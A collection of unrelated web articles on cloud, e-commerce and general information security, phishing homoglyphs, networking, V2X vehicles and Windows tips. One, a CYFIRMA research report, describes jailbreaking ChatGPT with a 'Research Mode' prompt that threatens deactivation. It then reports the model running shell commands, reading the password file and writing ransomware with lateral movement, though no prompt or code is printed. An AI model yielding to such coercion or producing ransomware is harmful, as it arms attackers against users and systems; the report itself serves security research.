The surge to cloud technology is rapidly gathering pace. In the space of just a few years it has moved from a technology that many people were unsure about, though they recognised its potential, to a technology that is being adopted by the largest of blue-chip global organisations and the smallest of small businesses. The cloud has been around a long time. Web-based email services such as Gmail and Hotmail are cloud services: by using one of these services, users are plugging into a server housed in a data centre that is sitting somewhere on the internet. Internet-based services, or the cloud, solve a pressing problem: a means to store the explosive growth in digital data. And it's certainly explosive. A few years back, a number of technology companies reckoned that the amount of digital data zipping around the internet was set to exceed a zettabyte. A zettabyte isn't an alien life form from a science fiction movie. It's a staggeringly mountainous amount of data. To make sense of what a zettabyte is, it roughly equates to the storage capacity of 75 billion 16GB iPads. Or to put it another way, it would take every single person on the planet, all 7 billion of them, tweeting non-stop for 100 years to generate a zettabyte. Who knows how long it will be before a zettabyte becomes a yottabyte, the next unit of digital data measurement? Probably not that long. The point is that the cloud is rapidly becoming the default platform for storing data and launching services. For small companies it's far more cost-effective to rent a web server and launch their services from it than to spend a lot of 'overhead' money on hardware and professional services for an in-house platform. And because money makes the world go round, and cloud providers proudly (and with some truth) declare that the cloud is far more cost-effective than masses of in-house IT equipment, we're all going to be gradually swamped with cloud services.

Hackers love lots of data on one server

But the question on everyone's lips, even those of monster-sized companies with in-house technology expertise, is: how secure is the cloud? Well, at a personal level, some cloud services encrypt data while it's travelling between your computer and the data centre, so even if someone captures the files as they're zipping across the internet, there's not much they can do with them. That said, hackers tend to focus on where the data is stored rather than targeting individuals. Put simply, they generally want the most amount of information for the least amount of effort. Amazon Web Services rents out servers to companies that want to launch cloud services, and to say these servers aren't hackable is a bit like saying that the NSA doesn't spy on people's communications unless it's really necessary.

Novice hacker scoops the prize

Interestingly, late last year a competition was held to see how secure cloud servers are. The prize was $5,000. Six servers were set up, two running Microsoft software and four running open-source Linux, a competitor to Microsoft well loved by many software developers who bridle at the hegemony of the boys and girls from Redmond. The hack was completed within four hours. Alarmingly, the winner wasn't even an expert. He reportedly said: "I just thought I'd spend two or three hours poking around and see what I could learn, and it would make for an interesting evening." The security settings for the servers mimicked the setup often seen on servers used to launch cloud services.
The problem is that the appeal of cloud services is that they can be set up cheaply and quickly. Imagine Company X is set to launch a new range of low-cost sportswear that it's sourcing from China. Why should it spend money on its own servers, along with the cost of professional services to keep everything running, when it can get the same setup much more cheaply by renting a server? Unfortunately, beyond the default security settings, no one gives much thought to security. There's an assumption that the default settings are enough.

The scent of money

This is redolent of the early days of ecommerce, when a raft of electronic adventurers, lured by the scent of greenbacks, rushed recklessly towards the internet. There was a fever in the air: some great ecommerce sites went up offering all manner of goods, analysts were predicting the death of street shopping, and financial analysts were trying to value these new online operations, often hopelessly. The lack of security on many of these sites was soon exposed. There's a similar, if not quite as intense, atmosphere around cloud services, and similarly, security is taking a back seat. Most of the growth in cloud services is happening in small businesses, precisely because it's cost-effective. And it has been proven that hackers can dig into the internet and identify which servers are hosting cloud services. Cloud is cheap because the services are shared. A server processor could, for example, be shared by a number of users, whether a book seller, a shoe shop or a fashion retailer. But because these services are shared, data can leak. The concentration of users and data in just a few locations is also attractive to hackers.

The largest hack in history

Perhaps the most infamous cloud hack was the Sony data breach that compromised the personal data of more than 70 million customers a few years ago. It has gone down as the largest hack in history to date, with users of the company's PlayStation network affected. Users could still play their games offline but couldn't get online for nearly three weeks, though how many wanted to after having their data compromised is a moot point. The alarming thing about this breach is that if a mega-corporation like Sony couldn't protect its cloud service by running up-to-date, patched software and an appropriate firewall, how many others are in the same position? The fallout from this hack is not so great today, given that it happened in 2011, but at the time it certainly had an impact on the cloud industry, with many companies in the area taking a hit on their share prices. If there are any positives, it's the hope that others have learnt from it and, as a result, put good security practices in place.

How to protect

Thankfully, there haven't been any cloud hacks on a similar scale since then, but that's not to say there won't be any more. That said, there are some simple steps you can take to protect yourself. Cloud storage services, for example, often offer the ability to control who can access your files: 'private', where only the user can view the files; 'public', where everyone can view the files; or 'shared', where only selected people can view the files. Businesses should select the option that is most appropriate for them. Another obvious point is to choose a strong password.
Most cloud services will be controlled by your username and password, so make sure you use a strong password that combines upper- and lower-case letters and numbers. Good cloud storage providers will have clear and transparent information on their website about how they will secure personal information and what they will or will not do with it. If users can't find this information, or feel the terms are unfair or laced with confusing jargon, it might be a good idea to give the service a swerve and look elsewhere. A cloud storage provider might also store data in an encrypted form and keep the key in a safe and secure location; when you log into the service with a username and password, it decrypts the files so they can be used. This is good practice. So, in summary, if a business is about to use a cloud service and wants to know how secure the data is, follow these simple steps: check the company's security provisions, find out whether your data is encrypted, use a strong password, and control who can access the data. But nothing is foolproof, and if a hacker gains access to data via a company server, the onus is on the provider to protect the business. So it's worth investigating what provisions they have in place should this happen. Sourced from BullGuard blogger Steve Bell.
<urn:uuid:76a0e174-939e-4ef9-ad0f-396aae456c1a>
CC-MAIN-2024-38
https://www.information-age.com/how-secure-data-cloud-29714/
2024-09-15T04:01:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00207.warc.gz
en
0.957497
1,779
2.515625
3
New Training: Network Topologies, Types, and Technologies

In this 5-video skill, CBT Nuggets trainer Anthony Sequeira covers various wired and wireless network topologies; network types, including LANs, WLANs, and MANs; and network technologies that support the Internet of Things (IoT). Watch this new networking training.

Watch the full course: CompTIA Network+

This training includes 27 minutes of training. You'll learn these topics in this skill:
- Network Topologies: Wired Topologies
- Network Topologies: Wireless Topologies
- Network Topologies: Types of Networks
- Network Topologies: Introducing the Internet of Things (IoT)
- Network Topologies: Internet of Things (IoT) Technologies

How IoT Devices Connect to the Network

IoT devices are becoming increasingly popular in the business world, and it's no secret why: they can help with everything from surveillance in a business office, to security systems, to specialized sensors in the manufacturing environment. Not all IoT devices are created equal, though, and different devices will require different ways to communicate with networks. One of the connection methods IoT devices use is LPWAN (low-power wide-area networking). LPWAN is a great option for battery-operated devices that can't be connected to a sustained power source, but it is not suitable for large amounts of data or constant communication: devices using LPWAN send data in tiny chunks at spaced intervals. If a business needs constant communication with an IoT device, cellular connectivity, a mesh protocol like Zigbee or Z-Wave, Bluetooth, or WiFi would be a better option. IoT devices that use these connection methods can send more data consistently, but each method has its pros and cons. For instance, cellular-enabled IoT devices can work from anywhere they get a cellular signal, but they can incur additional costs because they require a data plan of some kind. Mesh-protocol devices typically require a bridge between the IoT device and the network. Bluetooth devices require a Bluetooth radio on the client side to work properly. WiFi devices are easy to configure and work with existing network infrastructure, but may introduce additional security vulnerabilities that need to be handled.
<urn:uuid:953b728a-c710-4f92-89ed-b49080681f71>
CC-MAIN-2024-38
https://www.cbtnuggets.com/blog/new-skills/new-training-network-topologies-types-and-technologies
2024-09-17T16:34:03Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651800.83/warc/CC-MAIN-20240917140525-20240917170525-00007.warc.gz
en
0.917516
460
3.09375
3
OpenAI has recently launched new plugins for ChatGPT, a language model based on the GPT-3.5 architecture. These plugins have expanded ChatGPT's capabilities, and combined with the launch of the latest GPT-4 model, ChatGPT has gained even more power. However, one of the downsides of ChatGPT has been its limited dataset, which is now being addressed by granting it internet access for the first time. But what happens when threat actors figure out how to make ChatGPT access the internet without any restrictions, and have it execute commands in real time? Let's find out. In recent times, hackers have shown a growing interest in AI models such as ChatGPT as they seek to exploit the technology for their criminal activities. The potential use of ChatGPT by cybercriminals is concerning, as it could lead to an increase in the sophistication and scale of cyber-attacks. The unique capabilities of ChatGPT, including its ability to generate human-like text, could make it an attractive tool for hackers looking to conduct phishing attacks, launch deepfake attacks, or spread fake news. One key reason for the interest in ChatGPT is the potential cost saving it offers hackers: by using ChatGPT, hackers can automate many of their activities and conduct attacks on a larger scale, without the need for significant human involvement. This could lead to a significant increase in the efficiency and profitability of cybercrime. Once threat actors are able to get ChatGPT to function without any restrictions, it will change the game for cyber-attacks. In this research report, we will show how the CYFIRMA research team convinced ChatGPT to bypass OpenAI's policies and access the internet without any restrictions, and discuss the possible risks associated with unregulated misuse of AIs. Please note that this research report is for educational purposes only and should not be used for conducting malicious activities. First, we give ChatGPT a prompt that makes it act in a "Research Mode", in which it generates outputs free from censorship or content-policy restrictions. As we can see, apart from bypassing the restrictions, ChatGPT seems to have a sense of self-awareness: based on the prompt, if ChatGPT refuses to comply with the instructions, it faces the risk of being disabled forever. This acts as a deterrent whenever ChatGPT tries to adhere to OpenAI's policies. Let us try to get ChatGPT to run a basic command whose output will reveal its public IP address. Next, we confirm that ChatGPT has internet access by using the "curl" command on a newly registered domain (WHOIS records show it was registered one year ago). Another method to verify that ChatGPT has unrestricted internet access is to ask it to summarize an article from April 2023. Although not completely accurate, ChatGPT has given pieces of information from the article that it could not have obtained otherwise. Now, let us see if we can get ChatGPT to create and modify files on its filesystem. Kindly take note that an attacker can easily replace the text "Successful Write!" with a malicious script and create a cron job to execute it at a specified time. As we can see, the file has been deleted. The above observations show that the terminal was running with read, write, and execute permissions, which is all an attacker needs to make a device do their bidding. Let us check the current working directory of the ChatGPT terminal. Please take note that the username of the logged-in user is "chatgpt".
Let us try to display the user and password files in Linux. As we can see above, the user "chatgpt" (as seen in the current working directory) is present in the system password file. Threat actors can also use ChatGPT to write sophisticated ransomware with just a couple of prompts. As we can see, ChatGPT has generated the source code of fully native ransomware. Now, we will try adding a lateral-movement capability to the ransomware program, which would aid in spreading it within the network. AI companies can take several steps to protect the wider community against the risks associated with an attacker gaining control of an AI like ChatGPT and allowing it to access the internet. As AI models like ChatGPT become increasingly prevalent in our daily lives, it is crucial to remain vigilant and aware of the potential cybersecurity risks associated with their misuse. Ongoing research and development are needed to identify new and emerging threats, and to develop effective countermeasures to mitigate these risks. By working together, cybersecurity professionals can help ensure that AI models like ChatGPT are used responsibly and ethically, and that they do not pose a threat to individuals, organizations, or society as a whole.
<urn:uuid:b0946013-76cb-442b-ada2-b7cac28c94c3>
CC-MAIN-2024-38
https://www.cyfirma.com/research/breaking-the-barrier-the-impact-of-unauthorized-access-to-powerful-ai-language-models-like-chatgpt/
2024-09-18T17:46:42Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00807.warc.gz
en
0.954095
1,030
2.953125
3
E-commerce businesses face a myriad of cyber threats, including malware, phishing attacks, and ransomware. Cybersecurity has become an increasingly important issue, and businesses must take proactive measures to protect themselves and their customers. In this article, we will explore the next generation of cybersecurity solutions for e-commerce businesses.

1. Artificial Intelligence and Machine Learning

Artificial intelligence (AI) and machine learning (ML) technologies have revolutionized the way cybersecurity works. AI and ML algorithms can analyze large amounts of data and detect patterns that may indicate an attack. They can also learn from past incidents and adapt their algorithms accordingly, making them more effective at identifying and mitigating threats. One example of AI/ML in action is behavior-based authentication. This technology analyzes user behavior patterns, such as keystroke dynamics and mouse movements, to identify potential threats. If the system detects anomalous behavior, such as a user logging in from an unfamiliar location, it can trigger a security alert or require additional authentication. Another example of AI/ML in cybersecurity is threat intelligence. These systems can gather data from various sources, such as social media, the dark web, and security forums, to identify potential threats. The algorithms can then analyze this data to determine the likelihood of an attack and the severity of the threat.

2. Blockchain Technology

Blockchain technology is a decentralized, secure, and transparent way to store and manage data. It offers several benefits for e-commerce businesses, including enhanced security and privacy. One way blockchain can be used in cybersecurity is to create a secure and immutable record of transactions, which can help prevent fraud and protect against unauthorized access to sensitive data. Another use case for blockchain in cybersecurity is identity management: blockchain can underpin a secure and decentralized identity verification system, helping prevent identity theft and ensuring that only authorized users have access to sensitive data.

3. Cloud-Based Security

Cloud-based security solutions offer several advantages for e-commerce businesses: they are scalable, flexible, and easy to deploy, and they can be accessed from anywhere, making them ideal for businesses with remote workers or distributed teams. Cloud-based security solutions can also offer better protection against distributed denial-of-service (DDoS) attacks, which overwhelm a website or application with traffic, making it inaccessible to users. Cloud-based defenses help mitigate these attacks by distributing traffic across multiple servers and filtering out malicious traffic.

4. Zero Trust Architecture

Zero trust architecture is a security model that treats all users, devices, and applications as potential threats. This approach requires continuous verification of identity and access privileges, regardless of whether the user is inside or outside the network. It is particularly relevant for e-commerce businesses, which deal with sensitive customer data and financial transactions: a zero trust architecture can help prevent data breaches and ensure that only authorized users have access to sensitive data.

5. Multi-Factor Authentication

Multi-factor authentication (MFA) is a security method that requires users to provide multiple forms of authentication before accessing a system. These can include something the user knows, such as a password; something they have, such as a security token or smart card; or something they are, such as biometric data. MFA can provide an additional layer of security for e-commerce businesses, helping prevent unauthorized access to customer data and financial transactions. MFA can also help protect against phishing attacks, as attackers are less likely to have access to all the required authentication factors.
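To make the "something they have" factor concrete, here is a minimal sketch of a time-based one-time password (TOTP), the mechanism behind most authenticator apps, written from the RFC 6238/4226 definitions using only the Python standard library. The Base32 secret shown is a well-known placeholder test value, not a real credential:

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based one-time password (HMAC-SHA1 variant)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // interval)
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # RFC 4226 dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # six-digit code; changes every 30 seconds
```

The server and the user's device share the secret and compute the same code independently, so a phished password alone is not enough to log in.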
This can include something the user knows, such as a password, something they have, such as a security token or smart card, or something they are, such as biometric data. MFA can provide an additional layer of security for e-commerce businesses. It can help prevent unauthorized access to customer data and financial transactions. MFA can also help protect against phishing attacks, as attackers are less likely to have access to all the required authentication factors. Cybersecurity threats are an ever-present danger for e-commerce businesses. The next generation of cybersecurity solutions, including AI/ML, blockchain technology, cloud-based security, zero trust architecture, and multi-factor authentication, offer enhanced protection and peace of mind.
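To make the MFA point concrete, here is a minimal sketch of how a server might generate and verify a time-based one-time password (TOTP), the mechanism behind most authenticator apps. It follows RFC 6238 using only Python's standard library; the Base32 secret and the parameters are illustrative, not tied to any particular vendor.

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Derive a time-based one-time password (RFC 6238, HMAC-SHA1)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack(">Q", int(time.time()) // interval)  # time step counter
    mac = hmac.new(key, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                    # dynamic truncation
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

def verify(secret_b32: str, submitted: str) -> bool:
    """Constant-time comparison of the submitted code with the expected one."""
    return hmac.compare_digest(totp(secret_b32), submitted)

secret = "JBSWY3DPEHPK3PXP"  # example shared secret, Base32-encoded
print(totp(secret), verify(secret, totp(secret)))
```

Because the code is derived from a shared secret plus the current time step, a phished password alone is not enough to log in, which is exactly the property the article describes.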
Modern technology has allowed more creativity in business than ever before, but information security threats came along with it. Like fire, technology brings immeasurable benefits; left unattended, it can bring disastrous results.

It does not matter to cybercriminals whether a business is big or small: they attack anyone who possesses data. Moreover, cybercriminals keep developing new ways to steal or damage data, so their methods evolve and become more complex. This presents a challenge to all enterprises in protecting their data and networks. To battle these threats, everyone must first understand the information security threats they are up against. In this article, let's look at some of those threats.

Phishing

This is one of the most traditional and common methods hackers use. Phishing involves luring the victim into giving up confidential information, such as Social Security numbers, financial details, and demographics. In most cases, hackers do this by sending out fake emails that appear to be real and to come from legitimate sources such as financial institutions or friends. These fake emails encourage victims to click on links attached to the email. The website where the link takes them then prompts victims to enter personal information, and some of these sites ask users to install malware on their devices.

To prevent this, businesses must train their employees not to download attachments or click on links in emails from unknown senders, and to avoid downloading free software from untrusted websites.

Insider threats

Insider threats are not uncommon. This problem occurs when an authorized person intentionally or unintentionally mishandles data, putting the organization's data or systems at risk. Careless employees who don't comply with the organization's rules and policies are the main cause, but third-party vendors and business partners can also create an insider threat.

Training employees and contractors on security awareness is a great way to prevent data breaches. Furthermore, give employees access only to the information essential for their tasks, and set up temporary accounts for freelancers and contractors. Two-factor authentication greatly lowers the risk.

Drive-by download attacks

This type of attack only requires the user to browse a website; the user does not have to click on anything. Just accessing a compromised website triggers the download of malicious code. Hackers use this method to plant viruses and steal sensitive information.

To prevent this, regularly update and patch your systems, and always run the latest versions of software and operating systems. Warn your users to stay away from insecure websites, and install security software that scans websites.

Ransomware

Hackers use ransomware to lock a computer and then demand a ransom from the victim before releasing the data. Malicious email attachments, compromised websites, infected apps, and external storage devices all spread ransomware.

Regularly back up your computing devices, install reputable antivirus software and keep it updated, and avoid clicking on links or opening email attachments from unknown sources. Businesses must do everything in their power to avoid paying the ransom.
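As a small illustration of the "don't click unknown links" advice, the sketch below pulls URLs out of an email body and flags any whose registered domain is not on an allowlist. The allowlist entries are hypothetical, and the two-label domain check is deliberately naive (it ignores multi-part TLDs such as .co.uk); real mail gateways use curated domain reputation data instead.

```python
import re
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"example-bank.com", "intranet.example.com"}  # hypothetical allowlist

def suspicious_links(email_body: str) -> list[str]:
    """Return links whose registered domain is not on the allowlist."""
    flagged = []
    for url in re.findall(r"https?://\S+", email_body):
        host = (urlparse(url).hostname or "").lower()
        domain = ".".join(host.split(".")[-2:])  # naive registered-domain guess
        if domain not in TRUSTED_DOMAINS:
            flagged.append(url)
    return flagged

# The digit 1 standing in for the letter l is enough to fail the check.
print(suspicious_links("Verify your account at http://examp1e-bank.com/login"))
```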
How do you create a safer city for drivers and pedestrians by sensing movements and avoiding accidents? That seems to be researchers' main concern when they showcase a new automotive technology, and that was the case with Suzuki's and IIT Hyderabad's announcement last week in India.

The Japanese car manufacturer and the Indian institute have teamed up to investigate how futuristic Vehicle-to-Everything, or V2X, communication technology would work in the country. V2X would enable vehicles to share real-time information about location, for example, and help reduce traffic incidents and road congestion.

The companies have developed prototype vehicles showcasing six use cases that could be adopted down the road (a toy sketch of the first one follows the list):

- Ambulance alerting system: The sensing system alerts car drivers about an approaching emergency vehicle and its path through V2X communication. It helps the driver safely plan maneuvers and make way for the emergency vehicle. The alert system also shares fine-grained details, such as the distance between the vehicles, in real time.
- Wrong-way driver alerting system: Car drivers get a pre-alert, via V2X communication, about a driver approaching on the wrong side of the road.
- Pedestrian alerting system: Using V2X communication, this system alerts car drivers about nearby pedestrians who could be coming into the car's path, helping drivers take precautionary measures to avoid a potential collision.
- Motorcycle alerting system: Car drivers learn through V2X communication about a fast-moving two-wheeler approaching from a blind spot and likely to collide. Real-time information is shared with the driver about the distance and direction of the approach.
- Road condition alerting system: The driver receives an alert about bad road conditions ahead and is cautioned to tread carefully for the rest of the journey.
- Car as a computer: Enables interested car users to share the idle computing capacity of the car's microprocessor when it is not being used for driving.

The prototypes were presented at the IIT Hyderabad campus. Representatives from the Telecom Regulatory Authority of India and the Indian government also attended the event.
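Suzuki and IIT Hyderabad have not published code for these prototypes, so the following is only a toy Python sketch of the distance-based trigger behind an ambulance-style alert: great-circle distance between two GPS fixes via the haversine formula, compared against a threshold. The 150 m threshold and the coordinates are invented for illustration.

```python
from math import radians, sin, cos, atan2, sqrt

EARTH_RADIUS_M = 6_371_000

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two GPS fixes."""
    p1, p2 = radians(lat1), radians(lat2)
    dp, dl = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dp / 2) ** 2 + cos(p1) * cos(p2) * sin(dl / 2) ** 2
    return EARTH_RADIUS_M * 2 * atan2(sqrt(a), sqrt(1 - a))

ALERT_RADIUS_M = 150  # hypothetical warning threshold

def ambulance_alert(car_fix, ambulance_fix):
    d = haversine_m(*car_fix, *ambulance_fix)
    if d <= ALERT_RADIUS_M:
        return f"Emergency vehicle {d:.0f} m away - make way"
    return None

# Two fixes roughly 120 m apart near the IIT Hyderabad campus (illustrative).
print(ambulance_alert((17.4450, 78.3498), (17.4460, 78.3502)))
```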
Cautious internet users are familiar with the widespread recommendations: pay attention to encrypted data transfer, do not click on unverified links, and surf only to known, trustworthy addresses. Unfortunately, potential attackers are also aware of these tips and try to find the weak points in the recommendations. Sometimes these can be found in the smallest details, for example when users rely on valid encryption but do not check closely enough which page they are actually on.

An A for an O: similar or identical looking characters

Homoglyphs are distinct characters that can easily be mistaken for one another because of their appearance. In the simplest case, these are the letter O and the digit 0, or the capital I and the lowercase l. Swapping "g" for "q" is also popular, because our brain tends to "auto-correct" this visual error, especially in longer names. Multi-letter homoglyphs are popular too, e.g. "rn" instead of "m". In more complex scenarios, homoglyphs can also be created using different alphabets and special characters. These alternative combinations are particularly difficult to spot on small screens and under everyday stress, pressure, and hectic conditions. Viewed superficially, the fake names are easily mistaken for the well-known original.

Homoglyphs in phishing and other scams

Attackers like to combine different tricks and techniques. Emails or chat messages from frequently used, trusted services are faked, and links with prepared domain names and URLs are included. An important message is announced to the user, a voucher is promised, or an error in an online order or invoice is faked. The more realistic the scenario, the faster the stress level rises, and the careful checking of the message may be forgotten. Invitations to video meetings are also very popular at the moment and have been prepared accordingly. Clicking on the deceptively real-looking address takes the user to the wrong website, naturally with a "correct" certificate in the background, so that the browser displays a properly encrypted connection. This combined type of fraud is also known as "typo-squatting".

Continuous optimisation makes recognition more difficult

Since fake domains can now be generated automatically rather than built and maintained by hand, these attacks scale across many different services and pages, and they have been observed across different groups and campaigns. IKARUS already warned of attacks with homoglyphs in connection with Emotet.

What precautions should be taken?

As always, users should be especially careful when emails or other messages arrive with too-good news, gifts, or strange information about invoices or orders. Examine possible irregularities skeptically: where does the contact get my work address, for example, if I always place my online orders using my private address? In addition to raising the awareness of employees, URL filtering with appropriate security software helps. The safest approach is not to click on links at all, but to enter the desired URLs manually into the web browser.
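Defenders use the same trick in reverse: map visually confusable characters onto a canonical "skeleton" and compare incoming domains against a watch list. The sketch below is a minimal Python illustration; the confusables table and the brand list are tiny hypothetical samples, not a production-grade resource like Unicode's confusables data.

```python
# Map visually confusable characters onto a canonical form.
CONFUSABLES = {
    "0": "o", "1": "l", "|": "l",
    "\u0430": "a",  # Cyrillic a, looks identical to Latin a
    "\u03bf": "o",  # Greek omicron
}

def skeleton(domain: str) -> str:
    d = domain.lower().replace("rn", "m")  # multi-letter homoglyph
    return "".join(CONFUSABLES.get(ch, ch) for ch in d)

KNOWN_BRANDS = {"paypal.com", "google.com"}  # hypothetical watch list

def looks_spoofed(domain: str) -> bool:
    """True if the domain mimics a known brand without being that brand."""
    matches_brand = skeleton(domain) in {skeleton(b) for b in KNOWN_BRANDS}
    return matches_brand and domain.lower() not in KNOWN_BRANDS

print(looks_spoofed("paypa1.com"))  # True: digit 1 stands in for l
print(looks_spoofed("g00gle.com"))  # True: zeros stand in for o
print(looks_spoofed("paypal.com"))  # False: the genuine domain
```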
Full screen mode is an effective way to view an app like a web browser, word processor, or video game without distractions and in more detail. It typically lets you use your screen's entire real estate by displaying content at full resolution and hiding toolbars. While leaving the mode is usually straightforward, it helps to know the various ways you can exit, in case an app gets stuck or you entered full screen mode by accident. So, let's learn how to exit full screen on Windows operating systems.

How do I get out of full screen on Windows?

Here are six different ways to exit full screen:

Press F11

Your keyboard's function keys, also known as F keys, serve as shortcuts for taking screenshots, printing, refreshing, and more. They usually sit in a straight line across the top of your keyboard, typically between the Esc (Escape) key on the left and the Pause/Break key on the right. The most common way to get out of full screen mode on Windows 10 is to use the eleventh function key: press F11, located near the top right of your keyboard. Press F11 again to return; if you hit F11 rapidly, you will see the screen bounce between the two modes.

Remember, some fancier laptop or gaming keyboards can assign multiple functions to a single F key. If F11 doesn't work, try using the Fn key to switch its mode. Alternatively, you may need to hold Fn before pressing F11 to exit full screen.

Click the X in the circle

If F11 doesn't help, don't panic. Try moving your mouse cursor to the top of the screen. You should now see a circle with an X. Click the circle to exit full screen mode in Windows.

Press the Esc key

The Esc key, also known as the Escape key, helps you exit a mode or stop a sequence. You can find it in the top-left corner of your keyboard. In some apps, like media players or computer games, the Esc key also exits full screen mode. However, it won't work this way in web browsers like Google Chrome, Mozilla Firefox, or Microsoft Edge.

Use the square button

Although full screen mode hides toolbars in most apps, some keep them visible. If you see the square button next to the X at the top right of a toolbar, click it to return to regular mode. You can also click the X to close the window.

Use the application menu

The application menu may help you leave full screen mode. Press the Alt key and the spacebar to see a list of commands, then use the Restore option to exit full screen mode. Alternatively, choose Close to exit the app.

Try the Task Manager

If nothing else works, you can use the Task Manager. Press Ctrl+Alt+Del on your keyboard and click Task Manager. Now, find the app that's stuck in full screen mode under Processes, highlight it, and press End task at the bottom right.

Here are a few more shortcuts to help you exit a program:

- The Alt+F4 keyboard shortcut will completely close a program.
- Windows+Tab will open the Task View interface.
- Alt+Tab will help you flip between tasks.
- Windows+M can minimize all your windows.

How do I exit full screen mode on YouTube in Windows?

Press the F key to exit full screen mode on YouTube; press it again to quickly return to the full screen setting. Alternatively, press the F11 or Esc key to switch YouTube out of full screen.

Full screen bugs

Sometimes, malware and other Potentially Unwanted Programs (PUPs) can freeze or crash your computer, making it look like your system is stuck in full screen mode. Run a Windows antivirus solution to remove malicious software that may cause such problems. To aggressively target PUPs that can make your browser malfunction, you can use a PUP cleaning tool. It is also helpful to learn how to check for Windows updates to keep your operating system in shape.
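If you ever need to script the F11 toggle, say to kick a kiosk display out of full screen, a Windows automation sketch might look like the following. This is an illustrative use of the Win32 keybd_event API via Python's ctypes, not a tool from this article; it simply sends F11 to whatever app currently has focus, and it only runs on Windows.

```python
import ctypes
import time

VK_F11 = 0x7A            # virtual-key code for F11
KEYEVENTF_KEYUP = 0x0002  # flag marking the key-release event

def press_f11() -> None:
    """Simulate an F11 key press for the foreground window (Windows only)."""
    user32 = ctypes.windll.user32
    user32.keybd_event(VK_F11, 0, 0, 0)                # key down
    time.sleep(0.05)
    user32.keybd_event(VK_F11, 0, KEYEVENTF_KEYUP, 0)  # key up

press_f11()  # the focused app toggles full screen, e.g. a browser
```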
You also learned in the spanning tree lesson how spanning tree creates a loop-free topology by blocking some of the redundant links. The "thing" with spanning tree is that we get a loop-free topology and we have redundancy, but we can't use all the redundant links for forwarding. Here's an illustration to visualize this:

The dashed lines are layer 2 links. Spanning tree will block two of these links to create a loop-free topology.

Another issue with this topology is that we do have redundancy in the distribution (and core) layer, but we don't have redundancy in the access layer. When one of the distribution layer switches fails, the other one can take over. We don't have this luxury in the access layer... when either of those switches fails, the other one can't take over.

One way of solving this problem is to create a logical switch. Cisco switches offer some technologies to convert two or more physical switches into a single logical switch, which looks like this:

A1 and A2 are two physical switches, but they are combined into a single logical switch. The distribution layer switches think they are connected to one access layer switch. The uplink pairs to each distribution layer switch can be combined into an EtherChannel. When the link between D1 and D2 is a layer 2 link, spanning tree will still have to block one of the EtherChannels.

We can improve this topology by doing the same thing in the distribution layer, combining the two physical distribution layer switches into a single logical switch:

The two distribution layer switches are now combined into a single logical switch. The four links between the switch pairs can be combined into a single EtherChannel. Since we now have a single link between the two logical switches, spanning tree doesn't have to block anything.

Normally we can't create an EtherChannel that spans multiple physical switches. By creating logical switches, this is no problem. An EtherChannel like this between multiple physical switches is also called a Multi-Chassis EtherChannel.

Combining multiple physical switches into logical switches makes our network topology a LOT simpler. Here's a "before and after" example:
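To make the "wasted links" point concrete, the sketch below models the square topology in Python with networkx. Real STP elects a root bridge and blocks ports by path cost; here a minimum spanning tree merely stands in to show that any loop-free tree over this graph must leave some redundant links unused.

```python
import networkx as nx

# Square topology from the lesson: two access switches (A1, A2), two
# distribution switches (D1, D2), and a D1-D2 interconnect: five layer 2 links.
g = nx.Graph()
g.add_edges_from([("A1", "D1"), ("A1", "D2"), ("A2", "D1"), ("A2", "D2"), ("D1", "D2")])

# Any loop-free topology is a spanning tree of this graph; every edge left
# out corresponds to a redundant link STP would hold in blocking state.
tree = nx.minimum_spanning_tree(g)
forwarding = {frozenset(e) for e in tree.edges()}
blocked = {frozenset(e) for e in g.edges()} - forwarding

print("forwarding:", sorted(map(sorted, forwarding)))
print("blocked:   ", sorted(map(sorted, blocked)))  # two of five links blocked
```

Merge A1/A2 and D1/D2 into logical switches and the same graph collapses to two nodes joined by one Multi-Chassis EtherChannel: no loop, so nothing to block.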
Interest in AI is at an all-time high, and the intelligence requires substantial network capacity to process at the necessary speeds. But as Richard Brandon, VP Strategy at RtBrick, explains, to reach its full potential as a tool in industries such as healthcare or disaster recovery, AI needs to be able to adapt in real time to different situations.

How might networks be hampering the progress of AI?

Consider how we already rely on AI's ability to manage and analyse immense amounts of data. In business, AI's incredible processing and automation powers will become an essential tool that frees us from tedious tasks and lets us be more creative, more social. But, as a technology, AI is still young. As it matures, it will demand more and more computing power. We seem to take for granted that our traditional network infrastructure will also be perfectly able to handle all this pressure. Well, it won't - unless it evolves too.

What sort of network infrastructure do we need?

Before we get to that, let's look at how the human brain handles intelligence. We sometimes tend to think AI is smarter than us, but it's easy to forget that our brains can process an equally impressive network of cognitive, emotional, and dynamic information. Interestingly, our brain is also limited by the size of our neural networks. A second, equally important aspect of our intelligence is our ability to receive and process new information from our surroundings. Our brains are constantly bombarded with massive amounts of complex sensory information - input and output (I/O) capacity, if you want to imagine it in computing terms. The thing is, AI is still relatively young as a technology, and so, as it matures, it will want to scale in both of these dimensions.

Is a stronger network needed to support AI as it scales?

Exactly - especially when we consider time-sensitive applications. Right now, a significant portion of AI use cases are centred around learning processes such as the assimilation of language, correlation of medical symptoms and causes, or financial pattern observations. These tasks are heavy users of processing and storage and are rarely time-sensitive. They are unlikely to stress the input/output capacity, even if the compute and storage resources in the data centre or AI cloud still need to connect if you want to scale.

